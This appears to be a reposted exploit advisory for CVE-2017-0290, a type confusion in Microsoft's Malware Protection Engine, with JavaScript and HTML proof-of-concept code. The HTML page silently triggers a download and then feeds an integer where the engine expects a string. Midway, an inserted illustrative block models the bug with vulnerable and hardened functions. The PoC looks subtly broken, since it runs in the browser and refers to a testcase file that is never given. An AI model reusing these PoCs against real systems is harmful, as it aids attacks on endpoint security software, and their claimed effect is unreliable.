Microsoft Malware Protection Engine Type Confusion

Date: 09 Apr 2026 00:00:00
Reported by: indoushka
Type: packetstorm
Source: packetstorm.news

Critical type confusion in Microsoft Malware Protection Engine enables remote system-level execution via multiple vectors.

Code
==================================================================================================================================
    | # Title     : Microsoft Malware Protection Engine Type Confusion Leading to SYSTEM-Level RCE                                   |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.microsoft.com/fr-dz                                                                                  |
    ==================================================================================================================================
    
    [+] Summary    : CVE-2017-0290 is a critical Type Confusion vulnerability in the Microsoft Malware Protection Engine (MsMpEng.exe) that allows remote attackers to execute arbitrary code with NT AUTHORITY\SYSTEM privileges.
                     The vulnerability can be triggered with little to no user interaction through multiple vectors, including visiting a malicious website, opening a crafted email, or downloading a specially crafted file. 
                     The root cause lies in improper type handling within the toString() method of the JavaScript Error object, where unexpected object types can be passed instead of strings.
                     This leads to memory misinterpretation and potential control over internal pointers such as the vtable.
                     Successful exploitation results in an Access Violation (c0000005), which can be leveraged to gain control over the execution flow and ultimately achieve full system compromise.
    
    [+] Key Risk Factors :
    
    Remote Code Execution (RCE)
    Executes with SYSTEM-level privileges
    Enabled by default (no special configuration required)
    Multiple attack vectors (web, email, file-based)
    Difficult to detect due to support for numerous file formats
    
    [+] Technical Explanation :
    
    The toString() method expects this.message to be a string.
    Instead, an integer is supplied.
    In vulnerable versions of the engine, this mismatch leads to:
    Type Confusion
    Invalid memory access
    Crash (Access Violation)
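
The following is an added illustrative model, not part of the original advisory and not the Malware Protection Engine's code: a constructed tagged-value representation in which strings are heap slots, showing why a toString() that trusts this.message to be a string ends up reading unrelated memory when an integer is supplied, beside a variant that checks the type tag first. The names heap, makeString, makeInt, vulnerableErrorToString, safeErrorToString and demo are assumptions.

```javascript
// Constructed model of a tagged-value script engine (an assumption for illustration,
// not the Malware Protection Engine's code). Strings live in a "heap" array and a
// value tagged "string" carries its slot index; a value tagged "int" carries the number.
const heap = [
  "Error",                    // slot 0: default error name
  "harmless text",            // slot 1: an ordinary string
  { vtable: "<internal>" }    // slot 2: unrelated engine object (constructed)
];

function makeString(text) {
  heap.push(text);
  return { tag: "string", payload: heap.length - 1 };
}

function makeInt(n) {
  return { tag: "int", payload: n };
}

// Vulnerable pattern (models the flaw described above): assumes `message` is a
// string and dereferences its payload as a heap slot without checking the tag,
// so an integer payload is silently reinterpreted as a memory reference.
function vulnerableErrorToString(errObj) {
  const text = heap[errObj.message.payload];
  return "Error: " + text;
}

// Hardened pattern: check the tag before interpreting the payload; non-strings
// go through an explicit conversion and unknown tags are rejected.
function safeErrorToString(errObj) {
  const v = errObj.message;
  if (v === undefined) return "Error";
  let text;
  if (v.tag === "string") text = heap[v.payload];
  else if (v.tag === "int") text = String(v.payload);
  else throw new TypeError("unsupported value tag: " + v.tag);
  return "Error: " + text;
}

// Demonstration: the same integer message, two outcomes.
function demo() {
  const withString = vulnerableErrorToString({ message: makeString("boom") });
  const confused = vulnerableErrorToString({ message: makeInt(2) });   // reads slot 2
  const guarded = safeErrorToString({ message: makeInt(2) });
  return { withString, confused, guarded };
}
```

In the confused case the integer 2 is used as a slot index and the unrelated object in slot 2 is treated as the message text; in a native engine the same mistake turns an attacker-chosen integer into a pointer, which is the memory misinterpretation the advisory describes.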
    
    [+] Patch Information : The vulnerability was fixed by Microsoft through a security update released in May 2017.
    
    [+] POC   :  
    
    function demoTypeConfusion() {
        try {
            // An integer is supplied where toString() expects this.message to be a string.
            var fakeObject = {
                message: 12345
            };

            var result = Error.prototype.toString.call(fakeObject);

            console.log("Result:", result);
        } catch (e) {
            console.log("Error triggered:", e.message);
        }
    }

    demoTypeConfusion();

    HTML POC
    
    <!DOCTYPE html>
    <html>
    <head>
        <title>CVE-2017-0290 PoC</title>
    </head>
    <body>
        <h1>Proof of Concept - CVE-2017-0290</h1>
        <p>This file will crash MsMpEng.exe</p>
        
        <a href="testcase.txt" download id="exploitLink">download</a>
        
        <script>
    
            function triggerExploit() {
                // Integer supplied where the engine's Error.toString() expects a string.
                var controlledValue = 0x41414111 >> 1;
                var maliciousObject = {
                    message: controlledValue
                };
                (new Error()).toString.call(maliciousObject);
            }
            document.getElementById("exploitLink").click();
    
            setTimeout(triggerExploit, 100);
        </script>
    </body>
    </html>
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================


Scores (as of 09 Apr 2026 00:00, current):
Vulners AI Score: 7.2 (High risk)
CVSS 3: 7.8
CVSS 2: 9.3
EPSS: 0.77207